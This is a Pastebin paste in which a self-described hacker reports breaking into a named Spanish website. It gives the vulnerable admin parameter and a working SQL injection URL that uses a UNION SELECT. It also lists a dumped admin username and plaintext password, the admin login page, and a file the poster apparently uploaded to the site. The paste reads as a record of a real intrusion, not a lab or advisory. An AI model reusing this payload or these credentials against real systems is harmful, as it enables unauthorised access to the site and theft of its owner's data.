Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Target: http://www.floresteo.es/admin/listado.php?id_cat=5
- Parameter: id_cat=
- Vulnerability: SQL Injection
- Type: String
- Exploit/PoC: http://www.floresteo.es/admin/listado.php?id_cat=-5%27%20union%20all%20select%201,2,3,4,5,6--%20and%27x%27=%27y
- Automatized: None
- Hacker/Cracker/Coder: hPlow
- Dump data
- _________________________________________________________
- id,0x3a,usuario,0x3a,password
- 1:paciano:flor1325
- Note: Found the webpage admin -> http://www.floresteo.es/admin/login.php :)
- File uploaded
- __________________________________________________________
- http://www.floresteo.es/up/index.html%2500
Advertisement
Add Comment
Please, Sign In to add comment